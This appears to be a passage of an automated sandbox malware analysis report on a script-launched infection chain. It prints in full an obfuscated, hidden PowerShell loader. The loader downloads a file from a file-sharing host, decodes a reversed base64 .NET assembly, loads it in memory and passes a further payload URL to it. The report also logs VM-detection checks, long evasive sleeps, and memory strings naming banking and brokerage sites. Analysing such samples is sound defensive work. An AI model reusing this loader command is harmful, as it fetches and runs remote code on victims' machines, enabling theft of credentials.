                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_00423149 push eax; ret 6_2_00423179
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0041C50E push cs; iretd 6_2_0041C4E2
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004231C8 push eax; ret 6_2_00423179
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0040E21D push ecx; ret 6_2_0040E230
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0041C6BE push ebx; ret 6_2_0041C6BF
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0851E558 push eax; iretd 6_2_0851E559
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe  Memory allocated: 8510000 memory reserve | memory write watch
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe  Memory allocated: 8B60000 memory reserve | memory write watch
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe  Memory allocated: 8960000 memory reserve | memory write watch
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe  Code function: 6_2_004019F0 OleInitialize, _getenv, GetCurrentProcessId, CreateToolhelp32Snapshot, Module32First, CloseHandle, Module32Next, Module32Next, CloseHandle, GetModuleHandleA, FindResourceA, LoadResource, LockResource, SizeofResource, _malloc, _memset, SizeofResource, _memset, FreeResource, _malloc, SizeofResource, _memset, LoadLibraryA, GetProcAddress, VariantInit, VariantInit, VariantInit, SafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector, VariantClear, VariantClear, VariantClear
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599233Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599119Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598875Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598755Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598405Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598297Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598187Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 598078Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597969Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597855Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeThread delayed: delay time: 597734Jump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597625
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597515
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597406
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597297
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597184
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597078
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596969
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596846
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596719
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596609
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596500
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596390
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596280
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596047
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 595719
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 595593
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 595477
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 595364
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 595234
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 595094
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594969
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594859
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594750
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594640
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594531
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594409
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594281
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594172
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594062
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 593953
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 593844
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 593734
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 593625
                  Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1853
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1543
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5324
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4426
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Window / User API: threadDelayed 4118
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Window / User API: threadDelayed 5710
                  Source: C:\Windows\System32\wscript.exe TID: 7876 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116 | Thread sleep count: 5324 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116 | Thread sleep count: 4426 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 | Thread sleep time: -19369081277395017s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -23980767295822402s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 432 | Thread sleep count: 4118 > 30
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -599890s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -599781s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -599671s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -599562s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -599453s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -599344s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -599233s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 432 | Thread sleep count: 5710 > 30
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -599119s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -599000s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -598875s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -598755s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -598625s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -598405s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -598297s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -598187s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -598078s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -597969s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -597855s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -597734s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -597625s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -597515s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -597406s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -597297s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -597184s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -597078s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -596969s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -596846s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -596719s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -596609s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -596500s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -596390s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -596280s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -596047s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -595719s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -595593s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -595477s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -595364s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -595234s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -595094s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -594969s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -594859s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -594750s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -594640s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -594531s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -594409s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -594281s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -594172s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -594062s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -593953s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -593844s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -593734s >= -30000s
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe TID: 964 | Thread sleep time: -593625s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 600000
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 599890
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 599781
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 599671
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 599562
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 599453
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 599344
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 599233
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 599119
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 599000
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 598875
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 598755
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 598625
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 598405
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 598297
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 598187
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 598078
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597969
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597855
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597734
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597625
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597515
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597406
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597297
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597184
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 597078
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596969
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596846
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596719
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596609
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596500
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596390
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596280
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 596047
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 595719
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 595593
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 595477
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 595364
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 595234
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 595094
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594969
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594859
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594750
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594640
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594531
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594409
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594281
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594172
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 594062
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 593953
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 593844
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 593734
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Thread delayed: delay time: 593625
                  Source: OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Vmwaretrat
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: wscript.exe, 00000000.00000002.1463305435.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1460132187.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW:/B
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vboxservice
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q#C:\windows\System32\vboxservice.exe
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: wscript.exe, 00000000.00000002.1463305435.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1460132187.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: wscript.exe, 00000000.00000002.1463135847.000002BB93710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1459674044.000002BB9370B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWPfv
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Vmwareuser
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q&C:\windows\System32\Drivers\VBoxSF.sys
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q+C:\windows\System32\Drivers\VMToolsHook.dll
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q)C:\windows\System32\Drivers\VBoxGuest.sys
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q'C:\windows\System32\Drivers\Vmmouse.sys
